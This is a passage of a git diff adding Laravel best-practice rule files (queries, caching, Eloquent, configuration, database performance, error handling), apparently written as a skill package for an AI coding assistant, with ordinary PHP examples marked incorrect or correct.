+
+### 2. Advanced Query Patterns → `rules/advanced-queries.md`
+
+- `addSelect()` subqueries over eager-loading entire has-many for a single value
+- Dynamic relationships via subquery FK + `belongsTo`
+- Conditional aggregates (`CASE WHEN` in `selectRaw`) over multiple count queries
+- `setRelation()` to prevent circular N+1 queries
+- `whereIn` + `pluck()` over `whereHas` for better index usage
+- Two simple queries can beat one complex query
+- Compound indexes matching `orderBy` column order
+- Correlated subqueries in `orderBy` for has-many sorting (avoid joins)
+
+### 3. Security → `rules/security.md`
+
+- Define `$fillable` or `$guarded` on every model, authorize every action via policies or gates
+- No raw SQL with user input — use Eloquent or query builder
+- `{{ }}` for output escaping, `@csrf` on all POST/PUT/DELETE forms, `throttle` on auth and API routes
+- Validate MIME type, extension, and size for file uploads
+- Never commit `.env`, use `config()` for secrets, `encrypted` cast for sensitive DB fields
+
+### 4. Caching → `rules/caching.md`
+
+- `Cache::remember()` over manual get/put
+- `Cache::flexible()` for stale-while-revalidate on high-traffic data
+- `Cache::memo()` to avoid redundant cache hits within a request
+- Cache tags to invalidate related groups
+- `Cache::add()` for atomic conditional writes
+- `once()` to memoize per-request or per-object lifetime
+- `Cache::lock()` / `lockForUpdate()` for race conditions
+- Failover cache stores in production
+
+### 5. Eloquent Patterns → `rules/eloquent.md`
+
+- Correct relationship types with return type hints
+- Local scopes for reusable query constraints
+- Global scopes sparingly — document their existence
+- Attribute casts in the `casts()` method
+- Cast date columns, use Carbon instances in templates
+- `whereBelongsTo($model)` for cleaner queries
+- Never hardcode table names — use `(new Model)->getTable()` or Eloquent queries
+
+### 6. Validation & Forms → `rules/validation.md`
+
+- Form Request classes, not inline validation
+- Array notation `['required', 'email']` for new code; follow existing convention
+- `$request->validated()` only — never `$request->all()`
+- `Rule::when()` for conditional validation
+- `after()` instead of `withValidator()`
+
+### 7. Configuration → `rules/config.md`
+
+- `env()` only inside config files
+- `App::environment()` or `app()->isProduction()`
+- Config, lang files, and constants over hardcoded text
+
+### 8. Testing Patterns → `rules/testing.md`
+
+- `LazilyRefreshDatabase` over `RefreshDatabase` for speed
+- `assertModelExists()` over raw `assertDatabaseHas()`
+- Factory states and sequences over manual overrides
+- Use fakes (`Event::fake()`, `Exceptions::fake()`, etc.) — but always after factory setup, not before
+- `recycle()` to share relationship instances across factories
+
+### 9. Queue & Job Patterns → `rules/queue-jobs.md`
+
+- `retry_after` must exceed job `timeout`; use exponential backoff `[1, 5, 10]`
+- `ShouldBeUnique` to prevent duplicates; `WithoutOverlapping::untilProcessing()` for concurrency
+- Always implement `failed()`; with `retryUntil()`, set `$tries = 0`
+- `RateLimited` middleware for external API calls; `Bus::batch()` for related jobs
+- Horizon for complex multi-queue scenarios
+
+### 10. Routing & Controllers → `rules/routing.md`
+
+- Implicit route model binding
+- Scoped bindings for nested resources
+- `Route::resource()` or `apiResource()`
+- Methods under 10 lines — extract to actions/services
+- Type-hint Form Requests for auto-validation
+
+### 11. HTTP Client → `rules/http-client.md`
+
+- Explicit `timeout` and `connectTimeout` on every request
+- `retry()` with exponential backoff for external APIs
+- Check response status or use `throw()`
+- `Http::pool()` for concurrent independent requests
+- `Http::fake()` and `preventStrayRequests()` in tests
+
+### 12. Events, Notifications & Mail → `rules/events-notifications.md`, `rules/mail.md`
+
+- Event discovery over manual registration; `event:cache` in production
+- `ShouldDispatchAfterCommit` / `afterCommit()` inside transactions
+- Queue notifications and mailables with `ShouldQueue`
+- On-demand notifications for non-user recipients
+- `HasLocalePreference` on notifiable models
+- `assertQueued()` not `assertSent()` for queued mailables
+- Markdown mailables for transactional emails
+
+### 13. Error Handling → `rules/error-handling.md`
+
+- `report()`/`render()` on exception classes or in `bootstrap/app.php` — follow existing pattern
+- `ShouldntReport` for exceptions that should never log
+- Throttle high-volume exceptions to protect log sinks
+- `dontReportDuplicates()` for multi-catch scenarios
+- Force JSON rendering for API routes
+- Structured context via `context()` on exception classes
+
+### 14. Task Scheduling → `rules/scheduling.md`
+
+- `withoutOverlapping()` on variable-duration tasks
+- `onOneServer()` on multi-server deployments
+- `runInBackground()` for concurrent long tasks
+- `environments()` to restrict to appropriate environments
+- `takeUntilTimeout()` for time-bounded processing
+- Schedule groups for shared configuration
+
+### 15. Architecture → `rules/architecture.md`
+
+- Single-purpose Action classes; dependency injection over `app()` helper
+- Prefer official Laravel packages and follow conventions, don't override defaults
+- Default to `ORDER BY id DESC` or `created_at DESC`; `mb_*` for UTF-8 safety
+- `defer()` for post-response work; `Context` for request-scoped data; `Concurrency::run()` for parallel execution
+
+### 16. Migrations → `rules/migrations.md`
+
+- Generate migrations with `php artisan make:migration`
+- `constrained()` for foreign keys
+- Never modify migrations that have run in production
+- Add indexes in the migration, not as an afterthought
+- Mirror column defaults in model `$attributes`
+- Reversible `down()` by default; forward-fix migrations for intentionally irreversible changes
+- One concern per migration — never mix DDL and DML
+
+### 17. Collections → `rules/collections.md`
+
+- Higher-order messages for simple collection operations
+- `cursor()` vs. `lazy()` — choose based on relationship needs
+- `lazyById()` when updating records while iterating
+- `toQuery()` for bulk operations on collections
+
+### 18. Blade & Views → `rules/blade-views.md`
+
+- `$attributes->merge()` in component templates
+- Blade components over `@include`; `@pushOnce` for per-component scripts
+- View Composers for shared view data
+- `@aware` for deeply nested component props
+
+### 19. Conventions & Style → `rules/style.md`
+
+- Follow Laravel naming conventions for all entities
+- Prefer Laravel helpers (`Str`, `Arr`, `Number`, `Uri`, `Str::of()`, `$request->string()`) over raw PHP functions
+- No JS/CSS in Blade, no HTML in PHP classes
+- Code should be readable; comments only for config files
+
+## How to Apply
+
+Always use a sub-agent to read rule files and explore this skill's content.
+
+1. Identify the file type and select relevant sections (e.g., migration → §16, controller → §1, §3, §5, §6, §10)
+2. Check sibling files for existing patterns — follow those first per Consistency First
+3. Verify API syntax with `search-docs` for the installed Laravel version
\ No newline at end of file
diff --git a/.cursor/skills/laravel-best-practices/rules/advanced-queries.md b/.cursor/skills/laravel-best-practices/rules/advanced-queries.md
new file mode 100644
index 000000000..920714a14
--- /dev/null
+++ b/.cursor/skills/laravel-best-practices/rules/advanced-queries.md
@@ -0,0 +1,106 @@
+# Advanced Query Patterns
+
+## Use `addSelect()` Subqueries for Single Values from Has-Many
+
+Instead of eager-loading an entire has-many relationship for a single value (like the latest timestamp), use a correlated subquery via `addSelect()`. This pulls the value directly in the main SQL query — zero extra queries.
+
+```php
+public function scopeWithLastLoginAt($query): void
+{
+    $query->addSelect([
+        'last_login_at' => Login::select('created_at')
+            ->whereColumn('user_id', 'users.id')
+            ->latest()
+            ->take(1),
+    ])->withCasts(['last_login_at' => 'datetime']);
+}
+```
+
+## Create Dynamic Relationships via Subquery FK
+
+Extend the `addSelect()` pattern to fetch a foreign key via subquery, then define a `belongsTo` relationship on that virtual attribute. This provides a fully-hydrated related model without loading the entire collection.
+
+```php
+public function lastLogin(): BelongsTo
+{
+    return $this->belongsTo(Login::class);
+}
+
+public function scopeWithLastLogin($query): void
+{
+    $query->addSelect([
+        'last_login_id' => Login::select('id')
+            ->whereColumn('user_id', 'users.id')
+            ->latest()
+            ->take(1),
+    ])->with('lastLogin');
+}
+```
+
+## Use Conditional Aggregates Instead of Multiple Count Queries
+
+Replace N separate `count()` queries with a single query using `CASE WHEN` inside `selectRaw()`. Use `toBase()` to skip model hydration when you only need scalar values.
+
+```php
+$statuses = Feature::toBase()
+    ->selectRaw("count(case when status = 'Requested' then 1 end) as requested")
+    ->selectRaw("count(case when status = 'Planned' then 1 end) as planned")
+    ->selectRaw("count(case when status = 'Completed' then 1 end) as completed")
+    ->first();
+```
+
+## Use `setRelation()` to Prevent Circular N+1
+
+When a parent model is eager-loaded with its children, and the view also needs `$child->parent`, use `setRelation()` to inject the already-loaded parent rather than letting Eloquent fire N additional queries.
+
+```php
+$feature->load('comments.user');
+$feature->comments->each->setRelation('feature', $feature);
+```
+
+## Prefer `whereIn` + Subquery Over `whereHas`
+
+`whereHas()` emits a correlated `EXISTS` subquery that re-executes per row. Using `whereIn()` with a `select('id')` subquery lets the database use an index lookup instead, without loading data into PHP memory.
+
+Incorrect (correlated EXISTS re-executes per row):
+
+```php
+$query->whereHas('company', fn ($q) => $q->where('name', 'like', $term));
+```
+
+Correct (index-friendly subquery, no PHP memory overhead):
+
+```php
+$query->whereIn('company_id', Company::where('name', 'like', $term)->select('id'));
+```
+
+## Sometimes Two Simple Queries Beat One Complex Query
+
+Running a small, targeted secondary query and passing its results via `whereIn` is often faster than a single complex correlated subquery or join. The additional round-trip is worthwhile when the secondary query is highly selective and uses its own index.
+
+## Use Compound Indexes Matching `orderBy` Column Order
+
+When ordering by multiple columns, create a single compound index in the same column order as the `ORDER BY` clause. Individual single-column indexes cannot combine for multi-column sorts — the database will filesort without a compound index.
+
+```php
+// Migration
+$table->index(['last_name', 'first_name']);
+
+// Query — column order must match the index
+User::query()->orderBy('last_name')->orderBy('first_name')->paginate();
+```
+
+## Use Correlated Subqueries for Has-Many Ordering
+
+When sorting by a value from a has-many relationship, avoid joins (they duplicate rows). Use a correlated subquery inside `orderBy()` instead, paired with an `addSelect` scope for eager loading.
+
+```php
+public function scopeOrderByLastLogin($query): void
+{
+    $query->orderByDesc(Login::select('created_at')
+        ->whereColumn('user_id', 'users.id')
+        ->latest()
+        ->take(1)
+    );
+}
+```
\ No newline at end of file
diff --git a/.cursor/skills/laravel-best-practices/rules/architecture.md b/.cursor/skills/laravel-best-practices/rules/architecture.md
new file mode 100644
index 000000000..165056422
--- /dev/null
+++ b/.cursor/skills/laravel-best-practices/rules/architecture.md
@@ -0,0 +1,202 @@
+# Architecture Best Practices
+
+## Single-Purpose Action Classes
+
+Extract discrete business operations into invokable Action classes.
+
+```php
+class CreateOrderAction
+{
+    public function __construct(private InventoryService $inventory) {}
+
+    public function execute(array $data): Order
+    {
+        $order = Order::create($data);
+        $this->inventory->reserve($order);
+
+        return $order;
+    }
+}
+```
+
+## Use Dependency Injection
+
+Always use constructor injection. Avoid `app()` or `resolve()` inside classes.
+
+Incorrect:
+```php
+class OrderController extends Controller
+{
+    public function store(StoreOrderRequest $request)
+    {
+        $service = app(OrderService::class);
+
+        return $service->create($request->validated());
+    }
+}
+```
+
+Correct:
+```php
+class OrderController extends Controller
+{
+    public function __construct(private OrderService $service) {}
+
+    public function store(StoreOrderRequest $request)
+    {
+        return $this->service->create($request->validated());
+    }
+}
+```
+
+## Code to Interfaces
+
+Depend on contracts at system boundaries (payment gateways, notification channels, external APIs) for testability and swappability.
+
+Incorrect (concrete dependency):
+```php
+class OrderService
+{
+    public function __construct(private StripeGateway $gateway) {}
+}
+```
+
+Correct (interface dependency):
+```php
+interface PaymentGateway
+{
+    public function charge(int $amount, string $customerId): PaymentResult;
+}
+
+class OrderService
+{
+    public function __construct(private PaymentGateway $gateway) {}
+}
+```
+
+Bind in a service provider:
+
+```php
+$this->app->bind(PaymentGateway::class, StripeGateway::class);
+```
+
+## Default Sort by Descending
+
+When no explicit order is specified, sort by `id` or `created_at` descending. Explicit ordering prevents cross-database inconsistencies between MySQL and Postgres.
+
+Incorrect:
+```php
+$posts = Post::paginate();
+```
+
+Correct:
+```php
+$posts = Post::latest()->paginate();
+```
+
+## Use Atomic Locks for Race Conditions
+
+Prevent race conditions with `Cache::lock()` or `lockForUpdate()`.
+
+```php
+Cache::lock('order-processing-'.$order->id, 10)->block(5, function () use ($order) {
+    $order->process();
+});
+
+// Or at query level
+$product = Product::where('id', $id)->lockForUpdate()->first();
+```
+
+## Use `mb_*` String Functions
+
+When no Laravel helper exists, prefer `mb_strlen`, `mb_strtolower`, etc. for UTF-8 safety. Standard PHP string functions count bytes, not characters.
+
+Incorrect:
+```php
+strlen('José');          // 5 (bytes, not characters)
+strtolower('MÜNCHEN');  // 'mÜnchen' — fails on multibyte
+```
+
+Correct:
+```php
+mb_strlen('José');             // 4 (characters)
+mb_strtolower('MÜNCHEN');     // 'münchen'
+
+// Prefer Laravel's Str helpers when available
+Str::length('José');          // 4
+Str::lower('MÜNCHEN');        // 'münchen'
+```
+
+## Use `defer()` for Post-Response Work
+
+For lightweight tasks that don't need to survive a crash (logging, analytics, cleanup), use `defer()` instead of dispatching a job. The callback runs after the HTTP response is sent — no queue overhead.
+
+Incorrect (job overhead for trivial work):
+```php
+dispatch(new LogPageView($page));
+```
+
+Correct (runs after response, same process):
+```php
+defer(fn () => PageView::create(['page_id' => $page->id, 'user_id' => auth()->id()]));
+```
+
+Use jobs when the work must survive process crashes or needs retry logic. Use `defer()` for fire-and-forget work.
+
+## Use `Context` for Request-Scoped Data
+
+The `Context` facade passes data through the entire request lifecycle — middleware, controllers, jobs, logs — without passing arguments manually.
+
+```php
+// In middleware
+Context::add('tenant_id', $request->header('X-Tenant-ID'));
+
+// Anywhere later — controllers, jobs, log context
+$tenantId = Context::get('tenant_id');
+```
+
+Context data automatically propagates to queued jobs and is included in log entries. Use `Context::addHidden()` for sensitive data that should be available in queued jobs but excluded from log context. If data must not leave the current process, do not store it in `Context`.
+
+## Use `Concurrency::run()` for Parallel Execution
+
+Run independent operations in parallel using child processes — no async libraries needed.
+
+```php
+use Illuminate\Support\Facades\Concurrency;
+
+[$users, $orders] = Concurrency::run([
+    fn () => User::count(),
+    fn () => Order::where('status', 'pending')->count(),
+]);
+```
+
+Each closure runs in a separate process with full Laravel access. Use for independent database queries, API calls, or computations that would otherwise run sequentially.
+
+## Convention Over Configuration
+
+Follow Laravel conventions. Don't override defaults unnecessarily.
+
+Incorrect:
+```php
+class Customer extends Model
+{
+    protected $table = 'Customer';
+    protected $primaryKey = 'customer_id';
+
+    public function roles(): BelongsToMany
+    {
+        return $this->belongsToMany(Role::class, 'role_customer', 'customer_id', 'role_id');
+    }
+}
+```
+
+Correct:
+```php
+class Customer extends Model
+{
+    public function roles(): BelongsToMany
+    {
+        return $this->belongsToMany(Role::class);
+    }
+}
+```
\ No newline at end of file
diff --git a/.cursor/skills/laravel-best-practices/rules/blade-views.md b/.cursor/skills/laravel-best-practices/rules/blade-views.md
new file mode 100644
index 000000000..c6f8aaf1e
--- /dev/null
+++ b/.cursor/skills/laravel-best-practices/rules/blade-views.md
@@ -0,0 +1,36 @@
+# Blade & Views Best Practices
+
+## Use `$attributes->merge()` in Component Templates
+
+Hardcoding classes prevents consumers from adding their own. `merge()` combines class attributes cleanly.
+
+```blade
+<div {{ $attributes->merge(['class' => 'alert alert-'.$type]) }}>
+    {{ $message }}
+</div>
+```
+
+## Use `@pushOnce` for Per-Component Scripts
+
+If a component renders inside a `@foreach`, `@push` inserts the script N times. `@pushOnce` guarantees it's included exactly once.
+
+## Prefer Blade Components Over `@include`
+
+`@include` shares all parent variables implicitly (hidden coupling). Components have explicit props, attribute bags, and slots.
+
+## Use View Composers for Shared View Data
+
+If every controller rendering a sidebar must pass `$categories`, that's duplicated code. A View Composer centralizes it.
+
+## Use Blade Fragments for Partial Re-Renders (htmx/Turbo)
+
+A single view can return either the full page or just a fragment, keeping routing clean.
+
+```php
+return view('dashboard', compact('users'))
+    ->fragmentIf($request->hasHeader('HX-Request'), 'user-list');
+```
+
+## Use `@aware` for Deeply Nested Component Props
+
+Avoids re-passing parent props through every level of nested components.
\ No newline at end of file
diff --git a/.cursor/skills/laravel-best-practices/rules/caching.md b/.cursor/skills/laravel-best-practices/rules/caching.md
new file mode 100644
index 000000000..eb3ef3e62
--- /dev/null
+++ b/.cursor/skills/laravel-best-practices/rules/caching.md
@@ -0,0 +1,70 @@
+# Caching Best Practices
+
+## Use `Cache::remember()` Instead of Manual Get/Put
+
+Atomic pattern prevents race conditions and removes boilerplate.
+
+Incorrect:
+```php
+$val = Cache::get('stats');
+if (! $val) {
+    $val = $this->computeStats();
+    Cache::put('stats', $val, 60);
+}
+```
+
+Correct:
+```php
+$val = Cache::remember('stats', 60, fn () => $this->computeStats());
+```
+
+## Use `Cache::flexible()` for Stale-While-Revalidate
+
+On high-traffic keys, one user always gets a slow response when the cache expires. `flexible()` serves slightly stale data while refreshing in the background.
+
+Incorrect: `Cache::remember('users', 300, fn () => User::all());`
+
+Correct: `Cache::flexible('users', [300, 600], fn () => User::all());` — fresh for 5 min, stale-but-served up to 10 min, refreshes via deferred function.
+
+## Use `Cache::memo()` to Avoid Redundant Hits Within a Request
+
+If the same cache key is read multiple times per request (e.g., a service called from multiple places), `memo()` stores the resolved value in memory.
+
+`Cache::memo()->get('settings');` — 5 calls = 1 Redis round-trip instead of 5.
+
+## Use Cache Tags to Invalidate Related Groups
+
+Without tags, invalidating a group of entries requires tracking every key. Tags let you flush atomically. Only works with `redis`, `memcached`, `dynamodb` — not `file` or `database`.
+
+```php
+Cache::tags(['user-1'])->flush();
+```
+
+## Use `Cache::add()` for Atomic Conditional Writes
+
+`add()` only writes if the key does not exist — atomic, no race condition between checking and writing.
+
+Incorrect: `if (! Cache::has('lock')) { Cache::put('lock', true, 10); }`
+
+Correct: `Cache::add('lock', true, 10);`
+
+## Use `once()` for Per-Request Memoization
+
+`once()` memoizes a function's return value for the lifetime of the object (or request for closures). Unlike `Cache::memo()`, it doesn't hit the cache store at all — pure in-memory.
+
+```php
+public function roles(): Collection
+{
+    return once(fn () => $this->loadRoles());
+}
+```
+
+Multiple calls return the cached result without re-executing. Use `once()` for expensive computations called multiple times per request. Use `Cache::memo()` when you also want cross-request caching.
+
+## Configure Failover Cache Stores in Production
+
+If Redis goes down, the app falls back to a secondary store automatically.
+
+```php
+'failover' => ['driver' => 'failover', 'stores' => ['redis', 'database']],
+```
\ No newline at end of file
diff --git a/.cursor/skills/laravel-best-practices/rules/collections.md b/.cursor/skills/laravel-best-practices/rules/collections.md
new file mode 100644
index 000000000..14f683d32
--- /dev/null
+++ b/.cursor/skills/laravel-best-practices/rules/collections.md
@@ -0,0 +1,44 @@
+# Collection Best Practices
+
+## Use Higher-Order Messages for Simple Operations
+
+Incorrect:
+```php
+$users->each(function (User $user) {
+    $user->markAsVip();
+});
+```
+
+Correct: `$users->each->markAsVip();`
+
+Works with `each`, `map`, `sum`, `filter`, `reject`, `contains`, etc.
+
+## Choose `cursor()` vs. `lazy()` Correctly
+
+- `cursor()` — one model in memory, but cannot eager-load relationships (N+1 risk).
+- `lazy()` — chunked pagination returning a flat LazyCollection, supports eager loading.
+
+Incorrect: `User::with('roles')->cursor()` — eager loading silently ignored.
+
+Correct: `User::with('roles')->lazy()` for relationship access; `User::cursor()` for attribute-only work.
+
+## Use `lazyById()` When Updating Records While Iterating
+
+`lazy()` uses offset pagination — updating records during iteration can skip or double-process. `lazyById()` uses `id > last_id`, safe against mutation.
+
+## Use `toQuery()` for Bulk Operations on Collections
+
+Avoids manual `whereIn` construction.
+
+Incorrect: `User::whereIn('id', $users->pluck('id'))->update([...]);`
+
+Correct: `$users->toQuery()->update([...]);`
+
+## Use `#[CollectedBy]` for Custom Collection Classes
+
+More declarative than overriding `newCollection()`.
+
+```php
+#[CollectedBy(UserCollection::class)]
+class User extends Model {}
+```
\ No newline at end of file
diff --git a/.cursor/skills/laravel-best-practices/rules/config.md b/.cursor/skills/laravel-best-practices/rules/config.md
new file mode 100644
index 000000000..8fd8f536f
--- /dev/null
+++ b/.cursor/skills/laravel-best-practices/rules/config.md
@@ -0,0 +1,73 @@
+# Configuration Best Practices
+
+## `env()` Only in Config Files
+
+Direct `env()` calls return `null` when config is cached.
+
+Incorrect:
+```php
+$key = env('API_KEY');
+```
+
+Correct:
+```php
+// config/services.php
+'key' => env('API_KEY'),
+
+// Application code
+$key = config('services.key');
+```
+
+## Use Encrypted Env or External Secrets
+
+Never store production secrets in plain `.env` files in version control.
+
+Incorrect:
+```bash
+
+# .env committed to repo or shared in Slack
+
+STRIPE_SECRET=sk_live_abc123
+AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI
+```
+
+Correct:
+```bash
+php artisan env:encrypt --env=production --readable
+php artisan env:decrypt --env=production
+```
+
+For cloud deployments, prefer the platform's native secret store (AWS Secrets Manager, Vault, etc.) and inject at runtime.
+
+## Use `App::environment()` for Environment Checks
+
+Incorrect:
+```php
+if (env('APP_ENV') === 'production') {
+```
+
+Correct:
+```php
+if (app()->isProduction()) {
+// or
+if (App::environment('production')) {
+```
+
+## Use Constants and Language Files
+
+Use class constants instead of hardcoded magic strings for model states, types, and statuses.
+
+```php
+// Incorrect
+return $this->type === 'normal';
+
+// Correct
+return $this->type === self::TYPE_NORMAL;
+```
+
+If the application already uses language files for localization, use `__()` for user-facing strings too. Do not introduce language files purely for English-only apps — simple string literals are fine there.
+
+```php
+// Only when lang files already exist in the project
+return back()->with('message', __('app.article_added'));
+```
\ No newline at end of file
diff --git a/.cursor/skills/laravel-best-practices/rules/db-performance.md b/.cursor/skills/laravel-best-practices/rules/db-performance.md
new file mode 100644
index 000000000..8fb719377
--- /dev/null
+++ b/.cursor/skills/laravel-best-practices/rules/db-performance.md
@@ -0,0 +1,192 @@
+# Database Performance Best Practices
+
+## Always Eager Load Relationships
+
+Lazy loading causes N+1 query problems — one query per loop iteration. Always use `with()` to load relationships upfront.
+
+Incorrect (N+1 — executes 1 + N queries):
+```php
+$posts = Post::all();
+foreach ($posts as $post) {
+    echo $post->author->name;
+}
+```
+
+Correct (2 queries total):
+```php
+$posts = Post::with('author')->get();
+foreach ($posts as $post) {
+    echo $post->author->name;
+}
+```
+
+Constrain eager loads to select only needed columns (always include the foreign key):
+
+```php
+$users = User::with(['posts' => function ($query) {
+    $query->select('id', 'user_id', 'title')
+          ->where('published', true)
+          ->latest()
+          ->limit(10);
+}])->get();
+```
+
+## Prevent Lazy Loading in Development
+
+Enable this in `AppServiceProvider::boot()` to catch N+1 issues during development.
+
+```php
+public function boot(): void
+{
+    Model::preventLazyLoading(! app()->isProduction());
+}
+```
+
+Throws `LazyLoadingViolationException` when a relationship is accessed without being eager-loaded.
+
+## Select Only Needed Columns
+
+Avoid `SELECT *` — especially when tables have large text or JSON columns.
+
+Incorrect:
+```php
+$posts = Post::with('author')->get();
+```
+
+Correct:
+```php
+$posts = Post::select('id', 'title', 'user_id', 'created_at')
+    ->with(['author:id,name,avatar'])
+    ->get();
+```
+
+When selecting columns on eager-loaded relationships, always include the foreign key column or the relationship won't match.
+
+## Chunk Large Datasets
+
+Never load thousands of records at once. Use chunking for batch processing.
+
+Incorrect:
+```php
+$users = User::all();
+foreach ($users as $user) {
+    $user->notify(new WeeklyDigest);
+}
+```
+
+Correct:
+```php
+User::where('subscribed', true)->chunk(200, function ($users) {
+    foreach ($users as $user) {
+        $user->notify(new WeeklyDigest);
+    }
+});
+```
+
+Use `chunkById()` when modifying records during iteration — standard `chunk()` uses OFFSET which shifts when rows change:
+
+```php
+User::where('active', false)->chunkById(200, function ($users) {
+    $users->each->delete();
+});
+```
+
+## Add Database Indexes
+
+Index columns that appear in `WHERE`, `ORDER BY`, `JOIN`, and `GROUP BY` clauses.
+
+Incorrect:
+```php
+Schema::create('orders', function (Blueprint $table) {
+    $table->id();
+    $table->foreignId('user_id')->constrained();
+    $table->string('status');
+    $table->timestamps();
+});
+```
+
+Correct:
+```php
+Schema::create('orders', function (Blueprint $table) {
+    $table->id();
+    $table->foreignId('user_id')->index()->constrained();
+    $table->string('status')->index();
+    $table->timestamps();
+    $table->index(['status', 'created_at']);
+});
+```
+
+Add composite indexes for common query patterns (e.g., `WHERE status = ? ORDER BY created_at`).
+
+## Use `withCount()` for Counting Relations
+
+Never load entire collections just to count them.
+
+Incorrect:
+```php
+$posts = Post::all();
+foreach ($posts as $post) {
+    echo $post->comments->count();
+}
+```
+
+Correct:
+```php
+$posts = Post::withCount('comments')->get();
+foreach ($posts as $post) {
+    echo $post->comments_count;
+}
+```
+
+Conditional counting:
+
+```php
+$posts = Post::withCount([
+    'comments',
+    'comments as approved_comments_count' => function ($query) {
+        $query->where('approved', true);
+    },
+])->get();
+```
+
+## Use `cursor()` for Memory-Efficient Iteration
+
+For read-only iteration over large result sets, `cursor()` loads one record at a time via a PHP generator.
+
+Incorrect:
+```php
+$users = User::where('active', true)->get();
+```
+
+Correct:
+```php
+foreach (User::where('active', true)->cursor() as $user) {
+    ProcessUser::dispatch($user->id);
+}
+```
+
+Use `cursor()` for read-only iteration. Use `chunk()` / `chunkById()` when modifying records.
+
+## No Queries in Blade Templates
+
+Never execute queries in Blade templates. Pass data from controllers.
+
+Incorrect:
+```blade
+@foreach (User::all() as $user)
+    {{ $user->profile->name }}
+@endforeach
+```
+
+Correct:
+```php
+// Controller
+$users = User::with('profile')->get();
+return view('users.index', compact('users'));
+```
+
+```blade
+@foreach ($users as $user)
+    {{ $user->profile->name }}
+@endforeach
+```
\ No newline at end of file
diff --git a/.cursor/skills/laravel-best-practices/rules/eloquent.md b/.cursor/skills/laravel-best-practices/rules/eloquent.md
new file mode 100644
index 000000000..09cd66a05
--- /dev/null
+++ b/.cursor/skills/laravel-best-practices/rules/eloquent.md
@@ -0,0 +1,148 @@
+# Eloquent Best Practices
+
+## Use Correct Relationship Types
+
+Use `hasMany`, `belongsTo`, `morphMany`, etc. with proper return type hints.
+
+```php
+public function comments(): HasMany
+{
+    return $this->hasMany(Comment::class);
+}
+
+public function author(): BelongsTo
+{
+    return $this->belongsTo(User::class, 'user_id');
+}
+```
+
+## Use Local Scopes for Reusable Queries
+
+Extract reusable query constraints into local scopes to avoid duplication.
+
+Incorrect:
+```php
+$active = User::where('verified', true)->whereNotNull('activated_at')->get();
+$articles = Article::whereHas('user', function ($q) {
+    $q->where('verified', true)->whereNotNull('activated_at');
+})->get();
+```
+
+Correct:
+```php
+public function scopeActive(Builder $query): Builder
+{
+    return $query->where('verified', true)->whereNotNull('activated_at');
+}
+
+// Usage
+$active = User::active()->get();
+$articles = Article::whereHas('user', fn ($q) => $q->active())->get();
+```
+
+## Apply Global Scopes Sparingly
+
+Global scopes silently modify every query on the model, making debugging difficult. Prefer local scopes and reserve global scopes for truly universal constraints like soft deletes or multi-tenancy.
+
+Incorrect (global scope for a conditional filter):
+```php
+class PublishedScope implements Scope
+{
+    public function apply(Builder $builder, Model $model): void
+    {
+        $builder->where('published', true);
+    }
+}
+// Now admin panels, reports, and background jobs all silently skip drafts
+```
+
+Correct (local scope you opt into):
+```php
+public function scopePublished(Builder $query): Builder
+{
+    return $query->where('published', true);
+}
+
+Post::published()->paginate(); // Explicit
+Post::paginate(); // Admin sees all
+```
+
+## Define Attribute Casts
+
+Use the `casts()` method (or `$casts` property following project convention) for automatic type conversion.
+
+```php
+protected function casts(): array
+{
+    return [
+        'is_active' => 'boolean',
+        'metadata' => 'array',
+        'total' => 'decimal:2',
+    ];
+}
+```
+
+## Cast Date Columns Properly
+
+Always cast date columns. Use Carbon instances in templates instead of formatting strings manually.
+
+Incorrect:
+```blade
+{{ Carbon::createFromFormat('Y-d-m H-i', $order->ordered_at)->toDateString() }}
+```
+
+Correct:
+```php
+protected function casts(): array
+{
+    return [
+        'ordered_at' => 'datetime',
+    ];
+}
+```
+
+```blade
+{{ $order->ordered_at->toDateString() }}
+{{ $order->ordered_at->format('m-d') }}
+```
+
+## Use `whereBelongsTo()` for Relationship Queries
+
+Cleaner than manually specifying foreign keys.
+
+Incorrect:
+```php
+Post::where('user_id', $user->id)->get();
+```
+
+Correct:
+```php
+Post::whereBelongsTo($user)->get();
+Post::whereBelongsTo($user, 'author')->get();
+```
+
+## Avoid Hardcoded Table Names in Queries
+
+Never use string literals for table names in raw queries, joins, or subqueries. Hardcoded table names make it impossible to find all places a model is used and break refactoring (e.g., renaming a table requires hunting through every raw string).
+
+Incorrect:
+```php
+DB::table('users')->where('active', true)->get();
+
+$query->join('companies', 'companies.id', '=', 'users.company_id');
+
+DB::select('SELECT * FROM orders WHERE status = ?', ['pending']);
+```
+
+Correct — reference the model's table:
+```php
+DB::table((new User)->getTable())->where('active', true)->get();
+
+// Even better — use Eloquent or the query builder instead of raw SQL
+User::where('active', true)->get();
+Order::where('status', 'pending')->get();
+```
+
+Prefer Eloquent queries and relationships over `DB::table()` whenever possible — they already reference the model's table. When `DB::table()` or raw joins are unavoidable, always use `(new Model)->getTable()` to keep the reference traceable.
+
+**Exception — migrations:** In migrations, hardcoded table names via `DB::table('settings')` are acceptable and preferred. Models change over time but migrations are frozen snapshots — referencing a model that is later renamed or deleted would break the migration.
\ No newline at end of file
diff --git a/.cursor/skills/laravel-best-practices/rules/error-handling.md b/.cursor/skills/laravel-best-practices/rules/error-handling.md
new file mode 100644
index 000000000..bb8e7a387
--- /dev/null
+++ b/.cursor/skills/laravel-best-practices/rules/error-handling.md
@@ -0,0 +1,72 @@
+# Error Handling Best Practices
+
+## Exception Reporting and Rendering
+
+There are two valid approaches — choose one and apply it consistently across the project.
+
+**Co-location on the exception class** — keeps behavior alongside the exception definition, easier to find:
+
+```php
+class InvalidOrderException extends Exception
+{
+    public function report(): void { /* custom reporting */ }
+
+    public function render(Request $request): Response
+    {
+        return response()->view('errors.invalid-order', status: 422);
+    }
+}
+```
+
+**Centralized in `bootstrap/app.php`** — all exception handling in one place, easier to see the full picture:
+
+```php
+->withExceptions(function (Exceptions $exceptions) {
+    $exceptions->report(function (InvalidOrderException $e) { /* ... */ });
+    $exceptions->render(function (InvalidOrderException $e, Request $request) {
+        return response()->view('errors.invalid-order', status: 422);
+    });
+})
+```
+
+Check the existing codebase and follow whichever pattern is already established.
+
+## Use `ShouldntReport` for Exceptions That Should Never Log
+
+More discoverable than listing classes in `dontReport()`.
+
+```php
+class PodcastProcessingException extends Exception implements ShouldntReport {}
+```
+
+## Throttle High-Volume Exceptions
+
+A single failing integration can flood error tracking. Use `throttle()` to rate-limit per exception type.
+
+## Enable `dontReportDuplicates()`
+
+Prevents the same exception instance from being logged multiple times when `report($e)` is called in multiple catch blocks.
+
+## Force JSON Error Rendering for API Routes
+
